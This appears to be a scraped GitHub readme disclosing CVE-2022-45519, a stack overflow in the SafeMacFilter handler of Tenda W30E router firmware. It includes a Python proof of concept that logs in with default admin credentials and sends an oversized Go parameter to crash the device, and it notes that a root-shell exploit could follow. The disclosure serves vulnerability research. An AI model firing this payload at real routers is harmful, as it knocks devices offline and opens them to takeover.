Headline
CVE-2022-45519: IOT_Vul/readme.md at main · z1r00/IOT_Vul
Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the Go parameter at /goform/SafeMacFilter.
Permalink
Cannot retrieve contributors at this time
Tenda W30E V1.0.1.25(633) Stack overflow vulnerability****Firmware information
Manufacturer’s address:https://www.tenda.com.cn/
Firmware download address : https://www.tenda.com.cn/download/detail-2218.html
Affected version
Vulnerability details
In /goform/SafeMacFilter, when the menufacturer is tenda, Go will be copied to s by strcpy. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.
Poc
import requests
cmd = b’menufacturer=tenda&Go=’ + b’a’ * 0x3000
url = b"http://192.168.10.103/login/Auth" payload = b"http://192.168.10.103/goform/SafeMacFilter/?" + cmd
data = { "username": "admin", "password": "admin", }
def attack(): s = requests.session() resp = s.post(url=url, data=data) print(resp.content) resp = s.post(url=payload, data=data) print(resp.content)
attack()
You can see that the router crashed, and finally you can write an exp to get a root shell